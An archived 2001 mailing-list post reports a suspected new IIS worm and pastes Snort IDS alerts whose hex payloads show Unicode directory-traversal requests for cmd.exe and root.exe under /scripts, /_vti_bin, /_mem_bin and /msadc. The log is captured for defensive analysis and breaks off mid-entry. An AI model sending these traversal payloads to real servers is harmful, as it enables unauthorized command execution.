Security Incidents mailing list archives
Interesting Scan--Looks like a new worm.
From: Steve Halligan <agent33 () geeksquad com>
Date: Tue, 18 Sep 2001 09:13:56 -0500
I got this scan last night. Actually I got about 20 of these scans last
night from different IP's, all within my class A. I looks alot like the
SadMind worm, but if you look closely, it isn't. The scan is a much more
thorough scan for the Unicode directory traversal vulnerability. SadMind
didn't scan _mem_bin or try to look for cmd.exe on the d drive as this scan
does. As I said, I got this scan from about 20 different hosts, and
everyone did the same attempts in the same order.
Looks like we got a new worm on our hands.
-Steve
<------------begin scan log----------->
----------------------------------------------------------------------------
--
#(2 - 23173) [2001-09-18 08:44:56] WEB-IIS root.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=112 ID=51156 flags=0 offset=0 TTL=123 chksum=19696
TCP: port=2419 -> dport: 80 flags=***AP*** seq=3574684183
ack=2133368913 off=5 res=0 win=65535 urp=0 chksum=36743
Payload: length = 72
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A lose....
----------------------------------------------------------------------------
--
#(2 - 23174) [2001-09-18 08:44:57] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=120 ID=51295 flags=0 offset=0 TTL=123 chksum=19549
TCP: port=2571 -> dport: 80 flags=***AP*** seq=3578917915
ack=2133369798 off=5 res=0 win=65535 urp=0 chksum=47615
Payload: length = 80
000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
----------------------------------------------------------------------------
--
#(2 - 23175) [2001-09-18 08:44:57] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=120 ID=51407 flags=0 offset=0 TTL=123 chksum=19437
TCP: port=2645 -> dport: 80 flags=***AP*** seq=3582698035
ack=2133370349 off=5 res=0 win=65535 urp=0 chksum=2364
Payload: length = 80
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
----------------------------------------------------------------------------
--
#(2 - 23176) [2001-09-18 08:45:01] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=136 ID=51893 flags=0 offset=0 TTL=123 chksum=18935
TCP: port=2649 -> dport: 80 flags=***AP*** seq=3583242352
ack=2133371302 off=5 res=0 win=65535 urp=0 chksum=33450
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 23177) [2001-09-18 08:45:02] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=157 ID=52026 flags=0 offset=0 TTL=123 chksum=18781
TCP: port=2818 -> dport: 80 flags=***AP*** seq=3592447432
ack=2133374805 off=5 res=0 win=65535 urp=0 chksum=17590
Payload: length = 111
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23178) [2001-09-18 08:45:02] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=157 ID=52122 flags=0 offset=0 TTL=123 chksum=18685
TCP: port=2891 -> dport: 80 flags=***AP*** seq=3596176073
ack=2133375355 off=5 res=0 win=65535 urp=0 chksum=25116
Payload: length = 111
000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23179) [2001-09-18 08:45:03] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=185 ID=52158 flags=0 offset=0 TTL=123 chksum=18621
TCP: port=2897 -> dport: 80 flags=***AP*** seq=3596616353
ack=2133375899 off=5 res=0 win=65535 urp=0 chksum=19409
Payload: length = 127
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: www..Conn
----------------------------------------------------------------------------
--
#(2 - 23180) [2001-09-18 08:45:03] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=52304 flags=0 offset=0 TTL=123 chksum=18523
TCP: port=3008 -> dport: 80 flags=***AP*** seq=3601578388
ack=2133376550 off=5 res=0 win=65535 urp=0 chksum=11948
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23182) [2001-09-18 08:45:04] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=52382 flags=0 offset=0 TTL=123 chksum=18445
TCP: port=3026 -> dport: 80 flags=***AP*** seq=3603114557
ack=2133377691 off=5 res=0 win=65535 urp=0 chksum=46692
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23183) [2001-09-18 08:45:05] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=52747 flags=0 offset=0 TTL=123 chksum=18080
TCP: port=3029 -> dport: 80 flags=***AP*** seq=3603372780
ack=2133378431 off=5 res=0 win=65535 urp=0 chksum=49819
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23184) [2001-09-18 08:45:05] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=52944 flags=0 offset=0 TTL=123 chksum=17883
TCP: port=3034 -> dport: 80 flags=***AP*** seq=3603663173
ack=2133378648 off=5 res=0 win=65535 urp=0 chksum=22151
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23185) [2001-09-18 08:45:07] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=138 ID=53099 flags=0 offset=0 TTL=123 chksum=17727
TCP: port=3043 -> dport: 80 flags=***AP*** seq=3604607032
ack=2133380213 off=5 res=0 win=65535 urp=0 chksum=13390
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close
----------------------------------------------------------------------------
--
#(2 - 23186) [2001-09-18 08:45:09] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=136 ID=53291 flags=0 offset=0 TTL=123 chksum=17537
TCP: port=3125 -> dport: 80 flags=***AP*** seq=3609112694
ack=2133382006 off=5 res=0 win=65535 urp=0 chksum=41583
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 23187) [2001-09-18 08:45:12] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=140 ID=53537 flags=0 offset=0 TTL=123 chksum=17287
TCP: port=3233 -> dport: 80 flags=***AP*** seq=3614822904
ack=2133384416 off=5 res=0 win=65535 urp=0 chksum=3730
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F nnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23192) [2001-09-18 08:45:25] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=136 ID=56915 flags=0 offset=0 TTL=123 chksum=13913
TCP: port=3255 -> dport: 80 flags=***AP*** seq=3617233670
ack=2133389625 off=5 res=0 win=65535 urp=0 chksum=36633
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 23443) [2001-09-18 09:01:44] WEB-IIS CodeRed v2 root.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=112 ID=6898 flags=0 offset=0 TTL=123 chksum=63955
TCP: port=3144 -> dport: 80 flags=***AP*** seq=1769080350
ack=741806457 off=5 res=0 win=65535 urp=0 chksum=11798
Payload: length = 72
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F GET /scripts/roo
010 : 74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54 t.exe?/c+dir HTT
020 : 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 P/1.0..Host: www
030 : 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 ..Connnection: c
040 : 6C 6F 73 65 0D 0A 0D 0A lose....
----------------------------------------------------------------------------
--
#(2 - 23444) [2001-09-18 09:01:45] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=120 ID=6924 flags=0 offset=0 TTL=123 chksum=63921
TCP: port=3149 -> dport: 80 flags=***AP*** seq=1769404108
ack=741806470 off=5 res=0 win=65535 urp=0 chksum=1563
Payload: length = 80
000 : 47 45 54 20 2F 63 2F 77 69 6E 6E 74 2F 73 79 73 GET /c/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
----------------------------------------------------------------------------
--
#(2 - 23445) [2001-09-18 09:01:45] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=120 ID=6938 flags=0 offset=0 TTL=123 chksum=63907
TCP: port=3152 -> dport: 80 flags=***AP*** seq=1769560961
ack=741934470 off=5 res=0 win=65535 urp=0 chksum=44381
Payload: length = 80
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73 GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A ction: close....
----------------------------------------------------------------------------
--
#(2 - 23446) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=136 ID=6955 flags=0 offset=0 TTL=123 chksum=63874
TCP: port=3155 -> dport: 80 flags=***AP*** seq=1769708384
ack=741934489 off=5 res=0 win=65535 urp=0 chksum=14551
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 23447) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=157 ID=6967 flags=0 offset=0 TTL=123 chksum=63841
TCP: port=3158 -> dport: 80 flags=***AP*** seq=1769873826
ack=741934503 off=5 res=0 win=65535 urp=0 chksum=63689
Payload: length = 111
000 : 47 45 54 20 2F 5F 76 74 69 5F 62 69 6E 2F 2E 2E GET /_vti_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23448) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=157 ID=6978 flags=0 offset=0 TTL=123 chksum=63830
TCP: port=3159 -> dport: 80 flags=***AP*** seq=1769952837
ack=741934520 off=5 res=0 win=65535 urp=0 chksum=51490
Payload: length = 111
000 : 47 45 54 20 2F 5F 6D 65 6D 5F 62 69 6E 2F 2E 2E GET /_mem_bin/..
010 : 25 35 63 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E %5c../..%5c../..
020 : 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 %5c../winnt/syst
030 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
040 : 64 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 dir c+dir HTTP/1
050 : 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 .0..Host: www..C
060 : 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F onnnection: clo
----------------------------------------------------------------------------
--
#(2 - 23449) [2001-09-18 09:01:45] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=185 ID=6997 flags=0 offset=0 TTL=123 chksum=63783
TCP: port=3161 -> dport: 80 flags=***AP*** seq=1770079155
ack=741934531 off=5 res=0 win=65535 urp=0 chksum=32607
Payload: length = 127
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 35 63 GET /msadc/..%5c
010 : 2E 2E 2F 2E 2E 25 35 63 2E 2E 2F 2E 2E 25 35 63 ../..%5c../..%5c
020 : 2F 2E 2E 35 35 2E 2E 2F 2E 2E 63 31 2E 2E 2F 2E /..55../..c1../.
030 : 2E 2F 2E 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ./.../winnt/syst
040 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
050 : 64 69 72 20 33 32 2F 63 6D 64 2E 65 78 65 3F 2F dir 32/cmd.exe?/
060 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
070 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E Host: www..Conn
----------------------------------------------------------------------------
--
#(2 - 23450) [2001-09-18 09:01:45] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=137 ID=7023 flags=0 offset=0 TTL=123 chksum=63805
TCP: port=3168 -> dport: 80 flags=***AP*** seq=1770439362
ack=741934537 off=5 res=0 win=65535 urp=0 chksum=40273
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23451) [2001-09-18 09:01:45] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=137 ID=7048 flags=0 offset=0 TTL=123 chksum=63780
TCP: port=3178 -> dport: 80 flags=***AP*** seq=1770941763
ack=741934543 off=5 res=0 win=65535 urp=0 chksum=61368
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23452) [2001-09-18 09:01:46] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=137 ID=7074 flags=0 offset=0 TTL=123 chksum=63754
TCP: port=3185 -> dport: 80 flags=***AP*** seq=1771344844
ack=741934559 off=5 res=0 win=65535 urp=0 chksum=51427
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23453) [2001-09-18 09:01:46] WEB-IIS cmd.exe access
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=137 ID=7093 flags=0 offset=0 TTL=123 chksum=63735
TCP: port=3190 -> dport: 80 flags=***AP*** seq=1771628861
ack=741934568 off=5 res=0 win=65535 urp=0 chksum=30343
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 23454) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=138 ID=7120 flags=0 offset=0 TTL=123 chksum=63707
TCP: port=3195 -> dport: 80 flags=***AP*** seq=1771898912
ack=741934579 off=5 res=0 win=65535 urp=0 chksum=41598
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 nection: close
----------------------------------------------------------------------------
--
#(2 - 23455) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
hlen=5 TOS=0 dlen=136 ID=7159 flags=0 offset=0 TTL=123 chksum=63670
TCP: port=3202 -> dport: 80 flags=***AP*** seq=1772285234
ack=741934584 off=5 res=0 win=65535 urp=0 chksum=62289
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 23456) [2001-09-18 09:01:46] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.45.70 -> 65.29.59.66
